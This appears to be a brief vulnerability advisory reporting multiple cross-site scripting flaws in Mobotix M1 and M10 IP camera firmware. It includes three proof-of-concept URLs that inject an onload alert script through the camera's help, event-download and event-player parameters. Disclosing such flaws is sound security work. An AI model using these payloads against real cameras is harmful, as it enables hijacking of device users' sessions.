Mobotix IP Network Cameras Multiple XSS Version: Tested on M1 and M10 - M10-V2.0.5.2 - M1-V1.9.4.7 Discovered by: jaime.blasco(at)eazel(dot).es http://www.eazel.es Description: Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws. Due to improper filtering a remote attacker can cause a cross site scripting in these scripts: http://camera/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E The advisorie can be found at : http://www.eazel.es/media/advisory001.html